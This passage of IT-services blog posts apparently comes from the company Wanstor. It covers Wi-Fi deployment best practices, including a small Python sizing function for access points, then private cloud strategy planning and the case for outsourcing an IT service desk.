  • Employ redundancy to ensure reliability, availability, and coverage – For better coverage and more reliable performance, we suggest businesses use a dual-redundant infrastructure that includes two clouds, two WLAN controllers per building, and two APs covering every physical point in a building. This gives more APs per location and fewer users per AP, providing greater reliability and availability since there is no single point of failure. If any infrastructure component fails, any connecting wireless device will automatically roam to a neighbouring AP, minimising interruption to the user.
  • Perform site surveys and verify coverage – To adapt a Wi-Fi solution to different types and sizes of buildings, it is strongly suggested the IT Manager invests some time in using an automated Wi-Fi planning tool (a rough sizing sketch follows this list). This will help to meet the following criteria:
      • Enable a 15 to 20 percent AP overlap
      • Locate APs for redundancy and dynamic power allocation
      • Serve 15 to 20 users per AP
      • Make sure small cells are available for VoIP service
      • Provide coverage of conference rooms and shared areas separate from employee office areas
  • Test the quality of service for voice and video demands – Quite often Wi-Fi solutions are deployed with IT Managers thinking users will only be accessing email and a couple of low data usage apps. Nothing could be further from the truth. Walk past any coffee shop and you will see people on phones and tablets making calls, streaming films and uploading images to social networking sites. This means the Wi-Fi design has to have the right coverage and bandwidth to accommodate users’ needs at all times of the day.
  • Base wireless infrastructure on Wi-Fi controllers – Wi-Fi controllers allow IT administrators to create AP groups for geographical management and security, as well as to implement special features. If a change needs to be made to the wireless configuration of an entire building, such as adding an SSID (service set identifier), the administrator can simply apply that change to the group through the Wi-Fi controller. Implementing centralised management through WLAN controllers also enhances security by enabling IT administrators to check logs, configure security settings, and implement group policies for wireless users, all from one location. Wi-Fi controllers also make it easier to detect defective APs.
  • Follow the FCAPS model – To monitor and manage wireless infrastructure, Wanstor uses an FCAPS (fault, configuration, accounting, performance, and security) management model:
      • Fault – For IT notifications of errors, we use a management solution that classifies and forwards Simple Network Management Protocol (SNMP) traps and event messages based on severity.
      • Configuration – To reduce configuration time and effort, we use a generic global configuration template, supplemented with a local configuration template where necessary. For simple, global updates, we standardise as much as possible on a single firmware solution for APs across the enterprise.
      • Accounting/performance – For network health, we monitor coverage, load, utilisation, and uptime. Our troubleshooting capabilities include addressing single and multiple clients, depending on the extent of the issue.
      • Security – We configure the system to identify and alert us to rogue devices using unauthorised networks.
  • Set up a separate Wi-Fi channel for internet access by employee-owned devices – Employees want the flexibility to perform their jobs using the platforms, applications, online tools, and services they use on their own devices. To enable employee-owned devices in the enterprise, we suggest a business sets up a separate network for them, kept apart from business-only devices by different firewalls, so that personal traffic does not impact the corporate estate.
  • Define and control access by user type – In providing the right level of access for each user type (employee using a corporate-issued mobile business PC, employee using an employee owned device etc), use different Wi-Fi networks and standards.
  • Control access to data with authentication and role-based trust – Make all access to the Wi-Fi as secure as possible. Use technologies such as federation, multifactor authentication, and certificate services to control access to data by performing role-based trust calculations and managing access privileges appropriately.
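
As promised above, here is a rough, back-of-the-envelope sizing sketch based on the 15 to 20 users per AP guideline and dual redundancy; real deployments should always be confirmed with a proper site survey.

```python
import math

def access_points_needed(users, users_per_ap=20, redundancy_factor=2):
    """Rough sizing: one AP per 15-20 users, doubled for dual redundancy."""
    return math.ceil(users / users_per_ap) * redundancy_factor

# Illustrative only: a 300-person office at 20 users per AP.
print(access_points_needed(300))  # 30 APs, including the redundant set
```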

By incorporating some of the best practices above into your Wi-Fi planning and deployment phase, Wanstor believes businesses will be better prepared to take advantage of everything a wireless infrastructure has to offer.

For more information about Wanstor’s Wi-Fi services click here.


Is your private cloud strategy really working? What is your framework for success?

22nd December 2017

Whether you want to take your IT operations to the public cloud, keep them on-premises, host off-premises using a private cloud model, or indeed invest in a hybrid configuration, the IT Manager must start with a clear understanding of what they are trying to achieve from an IT and business perspective before embarking on their cloud journey.

This may seem like stating the obvious, but at Wanstor we have seen several cases recently where businesses have invested in cloud computing models without thinking about the outcomes they want from a cloud computing strategy.

It can be tempting to get caught up in debates and discussions about “cloud technology”; after all, it is a major IT trend which lots of IT and business leaders are talking about in various online and offline publications. However, just because something is a hot topic does not mean the fundamental questions of business need can go unaddressed:

  • What are the key drivers for change?
  • Do we need to change?
  • Are we trying to reduce operational costs?
  • What do we need to do to improve the IT infrastructure environment to better support the business?
  • How can we make staff more productive through IT?
  • What is the right approach for achieving IT objectives over the next 12 months?

Obviously these are not simple questions with simple answers. As Wanstor has learned from our experience of working with hundreds of businesses across the UK on private cloud migration projects, the unique challenges of cloud computing require new ways of thinking, planning, and cross-business collaboration to achieve common IT and business goals.

We have also seen that success comes early in a cloud computing engagement to those IT leaders who frame a realistic strategy at the outset, one with a clear definition of, and appreciation for, the capabilities and limitations of the businesses they lead.

At Wanstor we say business decision makers need to have a “cloud frame of mind.” We believe a “cloud frame of mind” should be used to tackle the various strategic considerations required in a private cloud deployment project.

So let’s start at the beginning, what are you trying to do with your private cloud project?

Generally, private clouds are invested in for one of three major business reasons:

Agility

  • Reduce time to market: Implement new business solutions quickly to accelerate revenue growth.
  • Better enable the solution development life cycle: Speed up business solutions through better development and test, and a fast path to production.
  • Be more responsive to business change: Deliver quickly on new requirements for existing business solutions.

Cost

  • Reduce operational costs: Optimize daily operational costs like people, power, and space.
  • Reduce capital costs or move to annuity-based operational costs: Benefit from reduced IT physical assets and more pay-per-use services.
  • Make IT costs transparent: Service consumers better understand what they are paying for.

Quality

  • Consistently deliver to better defined service levels: Better service leads to increased customer satisfaction.
  • Ensure continuity of service: Minimise service interruption.
  • Ensure regulatory compliance: Manage the compliance requirements that may increase in complexity with online services.

Where businesses locate their needs amongst these primary drivers and define their objectives as they consider their cloud computing options is a basic starting point in the process. For many in IT the private cloud is proving especially attractive, mainly for what it offers in terms of control over matters of security, data access, and regulatory compliance. Their primary interest in a private cloud architecture revolves around the pressures to cut costs without sacrificing control over essential data, core applications, or business-critical processes. The main secondary interests around private cloud computing are more to do with business growth and the possibilities it offers in terms of scaling workloads at different times of the year. This shows that IT leaders are beginning to think seriously about cloud computing as a way to turn IT into a business enabler rather than being seen as a costly department by other business unit leaders.

As identified above, there are several drivers IT leaders are investigating as reasons to move workloads to a private cloud model. Once the IT leader has identified business needs and objectives, they should take the time to understand the capabilities, limitations, and complexities of their current IT environment, which starts by performing an analysis of technical and organisational maturity against the different capabilities of cloud computing. The next step is then to determine where you want to take your IT team and the business it serves, and to assess the prerequisites for the desired objectives.

Many of the businesses we work with start at a basic stage of their cloud optimisation journey. Usually they have already managed to consolidate infrastructure resources for better cost efficiencies through virtualization. If your business fits this profile, an acceptable outcome might be to advance to the next stage by implementing more sophisticated infrastructure-level resource pooling, which would achieve still greater cost savings as well as a measure of improved time to market. Similarly, your current business capabilities may put you somewhere in the middle of the cloud maturity model, with a relatively high degree of sophistication in the business areas you consider your top priorities, such as being able to respond to seasonal shifts in demand.

While your ultimate goal might be to bring in platform as a service (PaaS) and software as a service (SaaS) architectures so you can leverage a larger set of hybrid cloud capabilities, such as anytime, anywhere access for your customers built on a unified set of compute, network, and storage resources, your near-term focus in the context of an infrastructure as a service (IaaS) model may simply be moving the dial on automated provisioning and de-provisioning of resources. It is in this approach, by making deliberate, incremental progress in the service of a longer-term strategy, that real IT transformation occurs on a private cloud model.

The way forward is to recognise that changing to a functional private cloud model is an evolutionary process, where the investments you make in technology solutions must be evenly matched at each step by the maturity of your business in managing them. Your strategy must be carefully applied in those areas where your business is likely to benefit most. Indeed, not all capabilities of a private cloud need to be, or should be exploited.

The real task lies in balancing the potential goods of a private cloud solution against actual business needs, understanding your capabilities and limitations at each stage of the process, and putting a plan in place that charts a realistic, achievable course of action for getting it done.

The objectives you choose for your private cloud will raise a number of questions about the various technical and organisational implications of implementing your solution. Below are some examples of the kinds of questions IT Managers need to be able to ask in order to frame a comprehensive and realistic strategy for achieving private cloud objectives.

Self-service – Do you want to allow your users to provision the resources they need on demand, without human intervention? How much control should you relinquish? What are the potential consequences of offering a self-service model for common tasks? Will cloud resources be left unchecked and unused if individual users can select their own licences and usage limits, and if so, how much money will unused accounts cost the business?

Usage-based – Pay-per-service, or “chargeback,” is one of the hallmarks of cloud computing, and if your private cloud strategy includes driving greater transparency of costs for better resource planning, you need to know which incentives you are trying to drive. Are you trying to reward good behaviour and punish bad? Do you wish to push more round-the-clock workloads to night-time operations for power savings that support your company’s environmental initiatives?

Elasticity – Being able to respond efficiently to fluctuations in resource usage can represent a major selling point for cloud computing. It is important to consider first whether you really need a sophisticated system of automated provisioning and de-provisioning of servers to deal with fluctuations in demand. If fluctuations are significant and relatively unpredictable, this capability may be appropriate. If the need is regular and predictable, straightforward automation may be sufficient for your purposes. Other questions you need to ask: which applications are priorities, and which can be pushed back?

Pooled resources – Consolidating resources to save on infrastructure, platform, and/or software costs is a common goal for large-scale IT operations. If you’re in a medium or large business with several independent departments, potentially with their own IT operations, you are likely to encounter critical questions of process. For example: will independent groups accept the inherent limitations of shared infrastructure and services? Will standardised configurations come at the cost of the optimised systems to which they’ve grown accustomed? As you move forward in the process of pooling your resources, you need to be aware of the likely trade-offs in putting everyone on a standard set of services. It may well be worth the cost to the business as a whole, but it may not seem that way to those who lose capabilities or levels of service to which they’ve been accustomed.

Comprehensive network access – As you move out from behind the business firewall and away from tightly controlled client configurations and network access scenarios, there are several important considerations that will need to inform your strategy, beyond the obvious concerns over security, such as the nature and extent of supportability: What kinds of personal devices will you support and to what degree? How will mobile clients (smartphones, operating systems and tablets) access network resources, and will you have the right levels of bandwidth to service them? What forms of authentication will you support?

Whatever objectives you are aiming to achieve, the important point to note is that building a private cloud is a process for which there are numerous tactical and strategic considerations. A successful private cloud implementation relies on the ability to think through all facets of the undertaking, clearly understanding the dependencies, trade-offs, limitations, and opportunities of any particular strategy. The reality for most businesses is that an incremental private cloud strategy is the only realistic path, given the technical and organisational complexity of current IT operations, built up as the business has invested large sums of money in them over time.

Expectations and realities of cloud computing in a business IT context can prove a challenge to reconcile. Many IT leaders understand why an incremental approach is needed, but those outside IT are often less clear about the real implications of implementing a cloud solution. The right strategy for achieving private cloud objectives must therefore include an appropriate communications strategy for setting and managing expectations across the business. With the whole business informed, from the board room to the front office, the hard work of defining and executing your private cloud strategy is far more likely to achieve its objectives and set your business on the path to long-term success in the cloud.

For more information about Wanstor’s private cloud services click here.

Reasons why business leaders need to consider outsourcing their IT service desk to a specialist provider

14th December 2017
|

At Wanstor we have recently been talking to a number of existing and potential customers about their IT service desk support. Our discussions have highlighted several major trends, many of which IT departments and business leaders were unaware of, that are putting pressure on IT service desk resources. For example:

  • Employees are more mobile than ever before, meaning issues arise at many different locations
  • Employees’ attitudes to work are changing: work is no longer a place you go, but something you do as and when required
  • Different business departments want access to cloud services
  • More and more applications are being developed and used in day-to-day business
  • Data management is becoming a serious headache as employees and customers demand access to it 24/7
  • More and more devices are in use, creating security and patch management challenges around resourcing and keeping users safe from potential attacks at all times
  • New technology and new devices are being launched all the time – what is the best way to offer support?
  • Growing operational costs of supporting a sprawling, mixed-vendor IT infrastructure
  • End users complaining about the time it takes to resolve issues through the IT service desk

Traditional IT help desks used to service the business during office hours and at fixed locations; this is no longer good enough. IT support staff are now required to be multi-skilled across a range of technologies and to provide support to staff at different locations 24/7.

As business technology has become increasingly complex, the need for dedicated IT support services has grown. Typically the IT help desk has provided end users with little more than basic troubleshooting and issue management. In the past, when technology came from only a handful of manufacturers, staff could easily be trained to appear knowledgeable about computers and IT infrastructure. However, as businesses have become more reliant on technology, a standardised and documented help desk approach is needed, one which offers a consistent set of services and protocols for help desk staff. Over the past decade, IT help desk teams have been hindered by the sheer speed at which enterprise technology has evolved, and a number of trends have made it increasingly difficult for traditional IT help desks to provide the kind of support end users need. These trends include:

  • Improvements in users’ personal IT have changed perceptions and expectations of what IT can do for them in their working lives. The user experience of smartphones and laptops is significantly better than even five years ago, and many of the leading technology providers offer consumers a high standard of customer service (just think of the Apple Store). So when users call their company’s IT service desk, they quickly become frustrated by untrained staff, poor communication, or inefficient processes they have to go through to get a simple problem fixed.
  • Most of the modern workforce have been using advanced technology for the majority of their lives. Many employees are capable of resolving minor troubleshooting problems themselves and are used to looking for answers online through search engines. Quite often, the IT help desk is a last resort for more complex problems, meaning help desk staff must be prepared to resolve more difficult issues.
  • As technology has evolved, users now rely on a wide variety of software and applications in their business lives. Today the typical business uses hundreds of applications, with staff constantly connecting to the network from different kinds of personal and mobile devices. Expecting the service desk to monitor and support this complexity alone is problematic, as every user has a different IT need in terms of software and applications.
  • Employees want to work when they want to, not when they are told to. This change in mindset, alongside the widespread acceptance of cloud technology and mobile devices, means business users can now access company content from their smartphones or laptops at any hour of the day. Most of the time this is hugely beneficial to the user and the company, allowing people to be productive out of the office. However, when they have problems logging onto the system or syncing a document to their device, they need support instantly. An IT help desk that is closed at weekends or after 5pm simply does not match up to user and business requirements.
  • More pressure is being placed on IT help desks themselves. Staff turnover is constant, as many internal help desk staff simply cannot cope with the demands being made of them. The HDI has regularly reported staff turnover rates on IT service desks as high as 40%, with many of those who stay complaining of stress and stress-related illness. Such high turnover means internal IT service desks often carry extremely large training bills, constantly struggling to train and retain skilled staff while many positions remain unfilled.

The issues identified above have led many businesses to explore alternatives to the traditional in-house IT support approach. At Wanstor we believe the aim is not to replace the talent firms already have. Rather, the goal should be to extend and enhance in-house IT staff, letting them focus their attention on high-value strategic activities while a mix of outsourced staff and technology handles the high-volume administrative tasks in support of wider business and IT goals.

At Wanstor we believe by enhancing internal IT services teams with improved help desk technology and outsourced IT service desk teams for high volume/admin heavy tasks, businesses can fill the skills, cost and user satisfaction gaps which exist and achieve the best possible ROI from their technology. The main reasons many business leaders are talking to Wanstor about outsourcing their IT helpdesks are:

Improved communication – Service desk communication focused on the specific needs of the business and its end users

Training – Outsourced IT service desk staff specialise in providing customer support for a wide range of technologies. This means that they are trained with the latest versions of software solutions. They can also be trained to help with a business’s specific technology set up.

Cost savings – Many IT outsourcing companies offer contracts that let businesses pay only for the services they need and use. An internal IT service desk is a fixed cost in terms of people and technology, which must be maintained even when the business does not require large volumes of IT support. Industry studies suggest that by moving to a pay-as-you-go IT service model, the operational costs of an IT service desk can often be cut by more than 20%.

Outsourcing part of your IT support service will only be successful if the solution and partner you choose align with the specific needs of your business. It is essential that business and IT decision makers develop a plan of requirements and expectations before they engage with an IT partner. By taking the time at the outset to establish what the business actually needs from an IT support partner, you can determine whether you are looking for someone to resolve repetitive problems such as password resets, or for a close partnership in which your IT help desk is fully supported by an external team and best-in-class technology.

At Wanstor we recommend all businesses do 5 things before they engage with and decide on an outsourced IT service desk partnership. They are:

  • Discuss what is going wrong with your existing IT help desk team, and see whether there are process or people improvements that could alleviate pressure and improve the service delivered back to the business
  • Interview a selection of end users to find out what they want and expect from an IT service desk, then evaluate whether you already have the skills and capabilities to satisfy those demands or genuinely need outside help
  • Have a vision of what you want the IT service desk to look like. Can you deliver that vision with internal staff, or do you need expert outside help to reach your IT and business goals? If you do want external IT support, what does your ideal IT partner look like and what services should they provide?
  • Engage with a partner who can support your vision and has the expertise and experience to turn it into reality. Your partner should be able to advise you on what is realistic, and you should expect them to guide you to a degree.
  • Set KPIs to judge whether the partnership is successful; measuring progress is highly valuable. Conduct regular customer satisfaction surveys to find out whether your business users are happier with the service they are receiving.

In summary, the traditional IT help desk model is obsolete. Business technology has moved on and is still evolving at a real pace, and traditional IT help desks are simply unable to cope with the increased demands being placed on them. At Wanstor we believe the future IT service desk model is a hybrid one: internal IT teams handle strategic, high-value programmes of work, while an external provider looks after the operational IT demands from users, such as patching, password resets, application updates and making sure the right security is in place. Get the internal/external mix right and your business can benefit from access to highly trained staff as and when it needs them, lower operational costs and improved end-user satisfaction.

To find out more about Wanstor’s vision of the IT service desk of the future download our whitepaper here.
